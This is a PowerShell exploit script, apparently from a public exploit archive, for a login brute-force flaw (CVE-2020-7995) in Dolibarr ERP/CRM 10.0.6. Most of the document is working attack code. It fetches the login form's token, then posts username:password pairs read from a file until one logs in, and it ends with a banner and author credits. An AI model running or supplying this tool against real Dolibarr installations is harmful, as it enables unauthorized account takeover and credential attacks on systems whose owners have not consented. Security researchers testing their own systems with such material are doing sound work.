# Exploit Title: Dolibarr ERP/CRM 10.0.6 - Login Brute Force # Date:2020-01-18 # Exploit Author: Creamy Chicken Soup # Vendor Homepage: https://www.dolibarr.org # Software Link: https://sourceforge.net/projects/dolibarr/ # Version: 10.0.6 # Tested on: Windows 10 - 64bit # CVE: CVE-2020-7995 function brute($url,$username,$passwd){ try{ $WebResponse = Invoke-WebRequest $url $a=$WebResponse.Forms.fields $fields=@{"token"=$a.token ;"loginfunction"=$a.loginfunction;"username"=$username;"password"=$passwd} $WebResponse1 = Invoke-WebRequest -Uri $url -Method Post -Body $fields if($WebResponse1.Forms.Id -ne "login"){ Write-Host "username password is match" Write-Warning "user: $username ,passwoed: $passwd" return $true } }catch{ Write-Warning "Something Wrong!" } } function fileinput($filepath,$url){ try{ Write-Host "Target: $url" $fp=Get-Content -Path $filepath foreach($line in $fp){ $s=$line -split ':' $username=$s[0] $passwd=$s[1] Write-Host "[+] Check $username : $passwd" $bf=brute $url $username $passwd if($bf -eq $True){ break } } }catch{ Write-Warning "File is error" } } $textart=@' ____ ____ _____ ____ _ ___ _ ____ _ _ ____ _ __ _____ _ ____ ____ _ ____ / _\/ __\/ __// _ \/ \__/|\ \/// _\/ \ /|/ \/ _\/ |/ // __// \ /|/ ___\/ _ \/ \ /\/ __\ | / | \/|| \ | / \|| |\/|| \ / | / | |_||| || / | / | \ | |\ ||| \| / \|| | ||| \/| | \__| /| /_ | |-||| | || / / | \__| | ||| || \_ | \ | /_ | | \||\___ || \_/|| \_/|| __/ \____/\_/\_\\____\\_/ \|\_/ \|/_/ \____/\_/ \|\_/\____/\_|\_\\____\\_/ \|\____/\____/\____/\_/ '@ Write-Host $textart Write-Host @' Exploit Title: DOLIBARR ERP/CRM - Brute Force Vulnerability Date: 2020-01-18 Exploit Author: CreamyChickenSoup Vendor Homepage: https://www.dolibarr.org Version: 10.0.6 CVE: CVE-2020-7995 Vulnerable Page : http://localhost/htdocs/index.php?mainmenu=home Twitter: @creamychickens1 cve submited:Tufan Gungor '@ $url=Read-Host "Enter Url:" $filepath=Read-Host "Enter FilePAth: (File content like : user:pass)" fileinput $filepath $url